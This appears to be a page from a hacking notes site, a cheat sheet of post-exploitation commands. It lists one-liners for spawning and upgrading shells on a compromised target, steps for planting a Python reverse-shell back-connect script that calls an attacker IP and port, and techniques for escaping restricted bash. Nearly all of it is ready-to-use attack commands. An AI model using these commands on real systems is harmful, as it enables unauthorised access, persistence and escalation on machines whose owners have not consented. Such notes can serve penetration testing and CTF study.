Hack$Notes
Search…
Spawning a Shell
Spawn a shell
The following commands can be used to spawn a shell once you have a foot inside.
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
script -qc /bin/bash /dev/null
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
exec "/bin/sh";
/bin/bash -i
exec "/bin/sh" # (From within IRB)
:!bash # (From within vi)
:set shell=/bin/bash:shell # (From within vi)
!sh # (From within nmap)

Method:

=================== On Kali ===================
CTRL+z <--- place the netcat connection to background
stty raw -echo <--- on your terminal
fg <--- bring back the terminal
stty -a <--- make a note of rows, columns
=================== On Target ===================
export SHELL=bash
export TERM=xterm256-color OR export TERM=xterm
stty rows 38 <--- from notes above.
stty columns 116 <--- from notes above.
Python PTY Shells
Clone the repo https://github.com/infodox/python-pty-shells.git
On kali:
1) Make changes to reflect your IP and PORT on tcp_pty_backconnect.py file
2) Pass this file to the target.
3) python tcp_pty_shell_handler.py -b IP:PORT
On target:
1) python tcp_pty_backconnect.py

Escaping RBASH (Restricted Bash)

##############################################
ssh [email protected]<IP-Adress> -t "bash --noprofile"
##############################################
vi
:set shell=/bin/bash
:shell
##############################################
cd /home
echo $SHELL
ed
!'/bin/bash'
pwd
##############################################
awk 'BEGIN {system("/bin/bash")}'
cd /home
cd ~
pwd
##############################################
perl -e 'system("/bin/bash");'
Copy link
Outline
Method: